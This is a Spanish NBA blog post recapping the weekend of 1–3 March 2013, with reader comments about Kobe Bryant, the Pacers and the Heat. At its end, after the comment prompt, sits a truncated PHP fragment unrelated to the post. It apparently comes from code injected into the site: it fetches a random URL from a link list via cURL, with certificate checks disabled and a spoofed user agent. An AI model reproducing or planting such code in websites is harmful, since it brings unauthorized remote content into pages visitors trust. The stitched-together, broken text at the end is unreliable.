Informe del fin de semana: un extraordinario fin de semana cualquiera

04 de March de 2013 por MagicJohnson32

VIERNES

Canastas ganadoras, sorpresas, confirmaciones, récords, equipos que se resisten a capitular, unas rachas que se extienden y otras que se acaban, lesiones que pueden cambiar la fisonomía de la liga en lo que queda de regular season… O, como lo llaman en la NBA, un viernes cualquiera.

Destacaba sobre el papel el cruce entre las dos mejores rachas ganadoras de la liga, las 12 victorias de los Heat contra las 8 de los Grizzlies. El partido fue áspero e intenso, como era de esperar, y Memphis logró que se viese la versión de LeBron James más mundana que se recuerda. No bastó. Wade cumplió con su parte, Battier metió sus triples y James encontró al final la manera de ser determinante (91-98). Pese a la derrota, los Grizzlies salen reforzados. Que no se diga que el excelente partido de Marc Gasol no sirvió de nada.

Lawson winnerOtro encuentro al que había que permanecer atentos era el que disputaban Thunder y Nuggets en Denver, y en efecto, no defraudó. Brillaron Westbrook (38-6-5), Durant (25-14-3-3) y Wilson Chandler (35 puntos, 6/7 triples) pero quien decidió fue Ty Lawson, autor de la canasta ganadora  a 0.2 segundos para el final (103-105). Los de George Karl siguen mirando hacia arriba y la cuarta plaza no es una idea descabellada. La quinta parece que la tienen asegurada, más aún tras la derrota de los Warriors en Boston (86-94), la tercera seguida para Golden State. Curry no pudo emular su actuación del Madison y la defensa de perímetro de los Celtics dejó en un 5 de 23 en triples a los cañoneros de Oakland. Los locales cedieron la batalla por el rebote (destacó como de costumbre Lee, con 19 capturas) pero dominaron el ritmo del partido y no sufrieron para sellar la victoria.

Aprovecharon la ocasión para recortar distancias Jazz y Rockets, que se impusieron respectivamente a Bobcats y Magic. Los de Salt Lake City aplastaron a Charlotte (68-98), y para ello no necesitaron ni a Jefferson ni a Millsap. Casi ni hizo falta Favors, con problemas de faltas toda la noche. Bastó con Kanter que, ante un equipo sin frontcourt como son estos Bobcats, arrasó en ambas zonas: 23 puntos (10/12 en tiros) y 22 rebotes. Los Bobcats como equipo cogieron dos rebotes más que el pívot turco. Más, mucho más, tuvieron que sudar los Rockets para ganar en Orlando (118-110), donde Tobias Harris se confirmó como la sensación de estos primeros partidos post trade deadline. Sus 27 puntos y 10 rebotes, unidos a las buenas actuaciones de Vucevic, Harkless y Nicholson ofrecen luz sobre el futuro a medio plazo de la franquicia de Florida, aunque no valieron para vencer a los Rockets. Por enésima vez esta temporada, los Magic desperdiciaron una oportunidad de ganar, y el conjunto liderado por James Harden no está por rechazar regalos. Montejunas volvió a rendir como titular, Delfino tuvo un buen día en el tiro, y Harden & Parsons se fueron por encima de la veintena para dar a los Rockets una importante victoria de cara a mantener a los Lakers en el retrovisor.

En el Este, ya se sabe, no se trata de quién (disputará los Playoffs) sino de en qué orden. Knicks y Pacers, favoritos para la segunda posición, cumplieron con victorias en Washington (96-88) y Toronto (93-81) respectivamente. Por cierto, Rudy Gay alcanzó la docena de partidos seguidos sin llegar al 50% en tiros de campo y ya no pinta todo tan bien como a su llegada a los Raptors. Aunque, comparado con la situación que atraviesa Bargnani, eso no es nada. Por su parte, Hawks y Nets cedieron dos derrotas más o menos sorprendentes. Atlanta cayó en Phoenix (87-92), en uno de esos días en los que Josh Smith se cree un buen triplista, mientras que los Mavs se impusieron en Brooklyn (98-90) con el particular revival de Nowitzki & Carter, que difícilmente conducirán a los texanos a los Playoffs pero -y que a nadie le quepa duda- no van a rendirse sin intentarlo.

Spurs benchSólo queda por repasar el triunfo de los Hornets sobre los Pistons (95-100), en otra gran actuación de Greivis ‘MIP’ Vasquez, y la demolición de los Kings a manos de los Spurs (102-130), que habría sido poco más que intrascendente de no ser por la lesión de Tony Parker. El base francés, al que tanto reivindicábamos en el blog durante las últimas semanas, se perderá el próximo mes con un esguince en el tobillo izquierdo. Ya no parece tan claro que los texanos vayan a cerrar la regular season en la primera plaza que ocupan.

TOP 10 del viernes

SÁBADO

Cuatro partidos y cuatro victorias locales fue lo que nos brindó la jornada del sábado. Arrancó la noche con Steph Curry inspiradísimo en Philadelphia. Anotó 7 de sus primeros 8 tiros y se fue hasta los 20 puntos en un suspiro. La diferencia en el marcador era de 16 puntos ya en el primer cuarto y tras un primer amago de remontada local volvió a los 11 en el tercer periodo, con Klay Thompson tomando el relevo anotador. Pero llegó la reacción definitiva de los Sixers de la mano de Holiday y Turner, dominadores en el tramo final para acabar con la racha de siete derrotas seguidas de su equipo, que además alcanzó la centena de puntos por primera vez en 13 encuentros (97-104). Los Warriors ya miran por encima del hombro.

En Chicago, otro soberbio partido de Joakim Noah y un parcial de 19-0 dieron la victoria (85-96) a los Bulls sobre unos Nets que no dejan de ofrecer motivos para la duda y ya han olvidado sus aspiraciones de ser segundos de conferencia.  Los que definitivamente no estarán en los Playoffs son los Raptors, que si tenían alguna esperanza, la perdieron en Milwaukee (114-122). Sin Rudy Gay, con Bargnani de titular, suficiente tuvieron los canadienses con forzar la prórroga gracias a una canasta de Alan Anderson. Lowry logró un triple doble redondo (10-10-10) y Jennings respondió con su mejor marca de asistencias (19), aunque las estrellas fueron Ellis (23-5-5) e Ilyasova (29 puntos y 11 rebotes).

Sin Love, ni Kirilenko, ni Roy, ni Budinger, ni Pekovic, último en sumarse a la sobrepoblada lista de lesionados de los Wolves, Minnesota poco pudo hacer en Portland (94-109). Derrick Williams puso la anotación y Ricky volvió a rozar el triple doble, pero Hickson se puso las botas en la pintura (18 puntos, 16 rebotes) y el banquillo de los Blazers aportó como nunca de la mano de Maynor, Leonard y Claver.

TOP 10 del sábado

DOMINGO

lebron mate MadisonArrancó el partido en el Madison entre Knicks y Heat con un Melo imparable, y parecía que los neoyorquinos iban a batir a los campeones por tercera vez esta campaña. Pero con estos Heat ya nos hemos acostumbrado a no dejarnos engañar por las apariencias y nunca darlos por muertos. Los Knicks se fueron 14 arriba al descanso con 24 de Anthony y cuatro triples de Kidd. Pero en la segunda mitad, la película cambió. El despertar anotador de Bosh y los triples desde la esquina de Battier fueron todo lo que necesitaron Wade y LeBron para rematar la faena (99-93). Tras el 87 iguales, los Heat echaron el cerrojo y James controló el tramo final, en el que JR Smith apareció más que Melo y casi siempre para mal. Ya son 14 victorias seguidas y en el calendario próximo de los Heat se avistan pocos rivales de nivel.

También emoción y mucha intensidad (excesiva en ocasiones) se vio entre Thunder y Clippers. Durante buena parte de la cita, Durant y Westbrook encontraron poca oposición y todo apuntaba a paseo visitante. Chris Paul anduvo casi desaparecido durante la primera mitad, en la que su equipo acumuló una desventaja de 15 puntos que pareció definitiva. No lo fue. Una defensa zonal anuló a Durant, y entre Paul y Crawford remaron hasta que una tontería de Ibaka, que agredió a Griffin mientras Barnes anotaba un triple, se tradujo en 7 puntos para los Clippers, que se situaban por delante por primera vez a 1:30 para el final. Apareció entonces Westbrook para decidir con dos canastas y una asistencia que redondearon su excelente encuentro y permiten a los de OKC distanciarse un poco más de los angelinos. Al final, 108-104.

Los Lakers vuelven a conseguir el 50% de victorias gracias a su triunfo frente los Hawks, 98-99. Como ya vamos comentando en los últimos días, Kobe Bryant parece vivir una quinta juventud (sólo hay que ver la mejor jugada de la noche en el vídeo de más abajo) y volvió a liderar a los suyos con 34 puntos, 11 de ellos en el último cuarto, y una canasta a falta de 9 segundos para el final que a la postre fue definitiva. Los Lakers llegaron a ganar por 16 puntos a mediados del tercer cuarto pero un arreón de los Hawks comandados por Devin Harris y Kyle Korver igualó de nuevo el partido. En el último cuarto Kobe se impuso a los desesperados intentos de Horford, Korver y Teague por llevarse la victoria.

Los Pacers cimentaron aún mejor su papel de serios aspirantes con una trabajada victoria frente los Bulls y ya van 6 victorias de 7 partidos tras el All-Star. David West y George Hill lideraron a los suyos en un partido que se decidió en los segundos finales, en los que Bellineli falló el triple que podría haber llevado el partido a la prórroga.

La anotación del día corrió a cargo de los Rockets, que endosaron 136 puntos a los Dallas Mavericks. Chandler Parson anotó los 11 primeros tiros que intentó y fue el principal protagonista de la orgía anotadora que vivieron los jugadores de Houston en el tercer cuarto. Y es que el partido llegó virtualmente empatado a la media parte pero un parcial de 44 a 17 a favor de los Rockets certificó su triunfo. Thomas Robisnon ya demostró en apenas 18 minutos de lo que es capaz.

En el resto de partido de la noche, victoria sin historia de los Grizzlies ante unos Magic a los que no les salió nada, derrota de los Sixers ante los Wizards de un John Wall clave en los minutos finales, paliza de los Kings sobre los Bobcats a los que llegaron a ganar de 43 puntos y victoria holgada de los Spurs ante los Pistons a pesar de no contar con Tony Parker.

TOP 10 del Domingo

Comenta

21 comentarios a esta entrada

  1. nba dice:
    #1

    Lo de Lebron empieza a ser acojonante, veremos si en playoffs cconsiguen anularlo en parte, porque pararle me da a mi que va a ser imposible.
    Y Kobe parece empeñado en llegar a playoffs, veremos como llegan con una rotacion tan corta

      Citar

  2. Esteban dice:
    #2

    viendo el contexto y teniedno en cuenta que no esta jugando al lado de CP3, esta es la mejor temporada de la carrera de DAVID WEST?

      Citar

  3. Esteban dice:
    #3

    los cavs cortan a selby, caso extraño el de este muchacho, con una liga de verano donde jugo a la altura de LILLADD ( y miren q bien le va a este) y dos temporadas quemando redes a mas no poder en la liga de desarrollo, llama la atencion que menphis lo regale primero y los cavs lo corten despues

    ojala q termine en el pacers

      Citar

  4. Jose Luis dice:
    #4

    Viendo o que le viene a los Lakers, si hasta el partido de los Pacers (incluido) hacen un 4-3, estaré contento. 5 partidos fuera de casa y sólo 2 en casa. Incluso un 3-4 quizá no estuviese muy mal, ya que después Kings, Suns y Wizards deberían ser victorias.

    Un 4-3 sería perder con Thunder y Pacers, y perder uno entre Bulls en LA y Hawks en Atlanta.

      Citar

  5. Denise dice:
    #5

    Jose Luis: Viendo o que le viene a los Lakers, si hasta el partido de los Pacers (incluido) hacen un 4-3, estaré contento. 5 partidos fuera de casa y sólo 2 en casa. Incluso un 3-4 quizá no estuviese muy mal, ya que después Kings, Suns y Wizards deberían ser victorias. Un 4-3 sería perder con Thunder y Pacers, y perder uno entre Bulls en LA y Hawks en Atlanta.

    el calendario de Lakers en marzo está tirado, facilisimo.
    Empiezan fuerte vs Oklahoma, en un partido fuera que pueden perder, pero despues tienen 2 muy faciles, contra Horntes y Raptors. Después partido en casa con Bulls sin su jugador franquicia y gira de 3 partidos frente a los temibles Magic, Hawks y Pacers. Despues le quedan partidos (la mayoria en casa) frente a equipillos como Phoenix, Sacramento, MIlwaukee, Minesotta, Washington.

    De 14 partidos van a ganar 10.

      Citar

  6. Jose Luis dice:
    #6

    Con que ganen 9 estoy contento jajajaja, si ganan 10 creo que ya casi se meterían fijo en PO.

      Citar

  7. Denise dice:
    #7

    Por si alguien no lo ha captado lo de temibles Magic, Hawks y Pacers es irónico. A Orlando le deben de ganar, y luego los Pacers y los Hawks son rivales duros pero inferiores a Lakers, un 2 de 3 minimo en esta mingira deberían de conseguir.

      Citar

  8. Jose Luis dice:
    #8

    Puf los Pacers en su casa son bastante duros, al igual que los Hawks. Aunque estoy de acuerdo que deberían ganar 2 de 3.

      Citar

  9. MagicJohnson32 dice:
    #9

    Indiana es una de las 5 pistas más difíciles de la NBA esta temporada, indiscutiblemente. Atlanta tampoco es fácil, además de que los Lakers juegan allí en la 2ª noche de un back-to-back.

    Pero yo creo que ahora mismo el debate en torno a los Lakers debería ser:

    ¿¿¿en serio tiene Kobe 34 años??? Qué animal…

      Citar

  10. Kaoz dice:
    #10

    Los Pacers inferiores que los Lakers esta temporada? enserio lo dicen ? Que NBA estan viendo ustedes, Indiana es un verdadero contender

      Citar

  11. Esteban dice:
    #11

    Cuanto menos los tengan en cuent, mas sorprendente sera lo de lospacers

      Citar

  12. Jose Luis dice:
    #12

    Para mi Pacers son finalistas del Este, pues con Miami no van a cruzarse antes, y de los demás equipos solo les veo suerándoles a unos Bulls con un buen Rose.

      Citar

  13. Ekos dice:
    #13

    Y que nadie descarte que podrían sorprender ante Miami, pues es el único equipo a mi opinión que puede realmente ponerlos en apuros, a ver.

      Citar

  14. Txusma dice:
    #14

    MagicJohnson32:

    ¿¿¿en serio tiene Kobe 34 años??? Qué animal…

    Muy bestia no solo su temporada sinó algunas de sus acciones que yo hacía tiempo que no le recordaba. Si digo q este Kobe me parece el mejor de los últimos años me paso?

      Citar

  15. Esteban dice:
    #15

    Ekos:
    Y que nadie descarte que podrían sorprender ante Miami, pues es el único equipo a mi opinión que puede realmente ponerlos en apuros, a ver.

    si hay un equipo en la NBA capaz de derrotar al HEAT, esos son los PACERS

    ojo no estoy diciendo ni por asomo que son el segundo mejor equipo de la liga, sino que sus virtudes y puntos fuertes son donde mas se notan los puntos debiles del heat, y ademas tienen cualidades justas para lograr neutralizarlos (lo que se pueda obvio)

    ya vimos el año pasado y en los juegos de este año que indiana puede ganarle y de hecho le gano varias veces al campeon

    en primer lugar, el todo poderoso LEBRON JAMES se enfrenta en un duelo que promete con un defensor mas alto y de brazos mas largos que el como GEORGE, el as defensivo del equipo, que no lo dejara seco, pero que al menos puede lograr que no luzca tan dominante como SHAQ

    wade se enfretara a un stephenson que sabe hacer pocas cosas, pero una de ellas es defender, es duro y tiene mentalidad para al menos molestar el trabajo de wade

    y por abajo esta lo mejor, si spolstra quiere ganarle a 7 juegos a los pacers no podra jugar con battier de 4 ni de coña, david WEST esta teniendo una temporada fantastica, y como ya lo hizo en otras ocasiones, va a deglutirse a battier una y otra vez si recibe la bola
    mientras que hibbert (que ojo, ha levatado enormemente su flojo comienzo) puede hacerse sentir en defensa y en ataque frente a bosh si este juega de 5

    todo esto sumado a la buena quimica y la exelente defensa de equipo, ya que en nombres los lakers tendrian los mismo buenos defensores y la misma potencia entre sus internos como para atacar las debilidades del heat, pero su quimica y su defensa son pesimas

      Citar

  16. Esteban dice:
    #16

    Txusma: Muy bestia no solo su temporada sinó algunas de sus acciones que yo hacía tiempo que no le recordaba. Si digo q este Kobe me parece el mejor de los últimos años me paso?

    y de los ultimos años te extralimitas un poco, por que pueden considerarse 5 años para atras, pero si que es el mejor de los ultimos dos sin dudarlo

    ahora digo, a este ritmo y a este nivel, es descabellado pensar que puede superar a MALONE?

    no hay por que creer que el proximo año kobe baje de los 25 ppp, no se notan grietas de la edad en su juego
    dentro de dos año aun podria seguir con los 20 por partido
    y sin dudas podria jugar 4 o 5 años mas con guarismos carcanos a los 20 tambien, pues ha pulido su juego y cada vez es menos fisico, pudiendo ser un tirador en un equipo donde ya no sea la estrella

      Citar

  17. MagicJohnson32 dice:
    #17

    Txusma: Muy bestia no solo su temporada sinó algunas de sus acciones que yo hacía tiempo que no le recordaba. Si digo q este Kobe me parece el mejor de los últimos años me paso?

    No, ni mucho menos te pasas. Para empezar, Kobe está más sano de lo que ha estado en mucho tiempo. Así se explica que se le vea mucho más agresivo de cara al aro y posteando, en lugar de limitarse a las suspensiones de media-larga distancia. Y sólo así se explican los mates que está haciendo (http://blog.tjnba.com/2013/03/04/los-mates-de-kobe-en-2013/), que en las últimas temporadas eran algo excepcional y este año lleva ya unos cuantos. De ahí que sus porcentajes sean altos y que llegue a los finales del partido con capacidad de marcar diferencias.

      Citar

  18. nba dice:
    #18

    No se esteban, yo es que a Kobe no lo veo en ningun equipo salvo en Lakers, aunque ceda el mando del equipo, siempre sera el alma de la ultima decada del equipo. Dependera si es capaz de asumir un rol como el de fisher llegado el momento porque con su calidad individual dudo que los Lakers decidan no renovarlo cuando su contrato actual espire

      Citar

  19. Esteban dice:
    #19

    nba:
    No se esteban, yo es que a Kobe no lo veo en ningun equipo salvo en Lakers, aunque ceda el mando del equipo, siempre sera el alma de la ultima decada del equipo. Dependera si es capaz de asumir un rol como el de fisher llegado el momento porque con su calidad individualdudo que los Lakers decidan no renovarlo cuando su contrato actual espire

    coincido, yo igualmente lo imaginaba en los LAKERS en una rapidisima reconstruccion cuando los contratos de pau, metta, blake y kobe terminen sus contratos, una renovacion de howard, y una renovacion baja de kobe (10 millones tiopo garnett y duncan, o menos) y podria ayudar al nuevo equipo

    si tenemos memoria, Kareem fue altamente determinante en su momento, un gigante de podria decir, pero en los ultimos años con los lakers cedio el protagonismo de jugar franquicia a magic, y si bien aun era muy util, no era el hombre determinante q supo ser,
    bueno si kobe puede hacer lo mismo que kareem, lo veo superando a Malone

      Citar

  20. charnes dice:
    #20

    Yo creo que kobe nunca será un jugador de rol…aguantará dos tres años a tope para ganar otro anillo pero nunca será un fisher…jordan, su ejemplo, no lo fue y kobe tampoco lo será…es imposible y es mejor asi…duncan garnet son diferentes…será un pierce. Y a malone no lo pilla

      Citar

  21. GreenPride dice:
    #21

    Domingo con 2 grandes partidos. En el Knicks-Heat, los campeones capearon el temporal en la primera parte con un Melo desatado y un Kidd que metía los triples que llevaba dos meses sin meter. Hasta de 17 se fueron los de New York pero todo hacía presagiar que el partido no estaba acabado. Vuelta de tuerca defensiva de Miami en el tercer cuarto y poco a poco los Heat fueron entrando en el partido hasta igualarlo. Una vez ahí se vió la experiencia y saber hacer de los campeones dominando claramente los ultimos minutos con un gran LeBron bien acompañado por Bosh, Wade y Battier. Por cierto, ¿Por qué los Knicks se juegan las posesiones decisivas a que tire JR Smith en vez de su jugador franquicia Carmelo Anthony? ¿Tanto miedo tenían a la defensa de LeBron?
    En LA, el otro equipo favorito para llegar a las finales, los Thunder hicieron un partido muy serio llevando siempre la iniciativa de manos de Durantula y Westbrook y con los demás cumpliendo sus papeles, especialmente en la defensa a CP3. Sin embargo, una zona y un arreón de Paul en el último cuarto estuvo a punto de dar la vuelta al encuentro. Al final, los de OKC supieron jugar los instantes decisivos y amarrar la victoria. A día de hoy la apuesta Heat-Thunder para las finales parece la más segura aunque este año los PO se presentan apasionantes, sobre todo en el Oeste donde los Lakers parecen en una misión para llegar a PO y si lo consiguen pueden ser un hueso para uno de los favoritos en primera ronda.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>